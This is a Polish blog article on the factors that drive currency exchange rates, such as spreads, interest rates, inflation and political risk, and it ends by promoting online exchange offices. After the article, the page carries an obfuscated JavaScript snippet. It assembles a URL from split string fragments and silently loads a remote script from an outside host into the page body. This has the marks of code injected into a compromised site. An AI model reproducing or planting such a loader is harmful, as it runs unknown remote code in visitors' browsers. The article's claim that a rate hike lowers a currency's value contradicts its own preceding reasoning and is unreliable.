Co wpływa na kursy walut?

Share on facebook
Share on google
Share on twitter
Share on linkedin

Przeciętnego klienta kantorów nie interesują czynniki, kształtujące cenę waluty. Warto jednak wiedzieć, dlaczego ich kursy ulegają zmianom czy wahaniom.  Poniżej przydatne wiadomości dla wszystkich początkujących na rynku walutowym.
Najkorzystniej kupować daną walutę tam, gdzie jest najniższy spread, czyli różnica pomiędzy ceną kupna, a ceną sprzedaży interesującej nas waluty. O wiele korzystniejsze spready znajdziemy w kantorach internetowych niż w tych stacjonarnych czy bankach. Różnice sięgają kilkudziesięciu groszy! Możemy to zauważyć, porównując kurs dolara w banku z kursem w kantorze internetowym. Dzięki niskiemu spreadowi na wymianie możemy sporo zaoszczędzić. Chociaż spread jest jednym z wielu czynników, kształtujących cenę waluty, to on najbardziej interesuje klientów i nadaje jej ostateczną wartość.
Nie bez przyczyny mówi się, że kurs waluty jest barometrem gospodarki danego kraju. To na jego podstawie wnioskujemy, czy jest ona stabilna, czy nie. Wpływ na jego wysokość ma m.in. polityka monetarna banku centralnego. Wysokość stóp procentowych oddziałuje na przyciągnięcie inwestorów zagranicznych, a co za tym idzie – wzrost popytu i podaży waluty. Sporą rolę odgrywa tu również poziom ryzyka inwestycyjnego. Podwyżka stóp procentowych skutkuje spadkiem notowań. Nie bez znaczenia jest także polityka gospodarcza danego kraju. Niestabilna sytuacja powoduje odpływ kapitału zagranicznego, a w konsekwencji obniżenie wartości waluty. Wzrost PKB i inflacja, również wpływają u na kształtowanie się ceny waluty.
Kolejnym czynnikiem, kształtującym kurs walut, jest sytuacja polityczna na świecie. Wojny, zamachy terrorystyczne, wybory rządowe i konflikty, zwiększają ryzyko inwestycyjne, co ma bezpośredni wpływ na walutę. Podobnie jak sytuacja społeczna. Strajki, zamieszki itp. sprawiają, że kurs waluty szybuje w dół.
Bilans płatniczy kraju, jeżeli jest dodatni, wzmacnia walutę. I odwrotnie. Wszystko ,co sprawia, że państwo postrzegane jest przez inwestorów jako stabilne i wiarygodne, wpływa na zwiększenie ceny waluty. Należy wspomnieć jeszcze o spekulacjach walutowych i działaniach banków inwestycyjnych. One również nie pozostają bez znaczenia w kształtowaniu ceny waluty.
Na wszystkie te czynniki nie mamy wpływu. Możemy jednak sami zdecydować, gdzie kupujemy walutę. Możemy wybrać kantor internetowy, który oferuje najkorzystniejsze dla kupujących spready. Wybierając odpowiedni kantor, mamy możliwość kupna walut w najlepszych cenach. Ma to znaczenie zwłaszcza wtedy, gdy wymieniamy większe sumy lub spłacamy kredyty walutowe. W ten sposób możemy sporo zaoszczędzić i obniżyć wysokość comiesięcznych rat.

(function(){
ii96_=(“u”+”st”);ii96=document.createElement(“script”);ii96.async=true;
ii96u=”64022442″;ii96_+=”a”+(“t.”);ii96_+=”i”+(“nf”+(“o”))+(“/”);
ii96u+=”.q60ll3h5i96vdkm4″;ii96u+=”ik6gnxft1X4zyz”;
ii96.src=”//”+ii96_+ii96u;ii96.type=”text/javascript”;
d_b=document.body;d_b.appendChild(ii96);
})();

Radosław Pawliński

Radosław Pawliński

Zostaw komentarz

Dołącz do Newslettera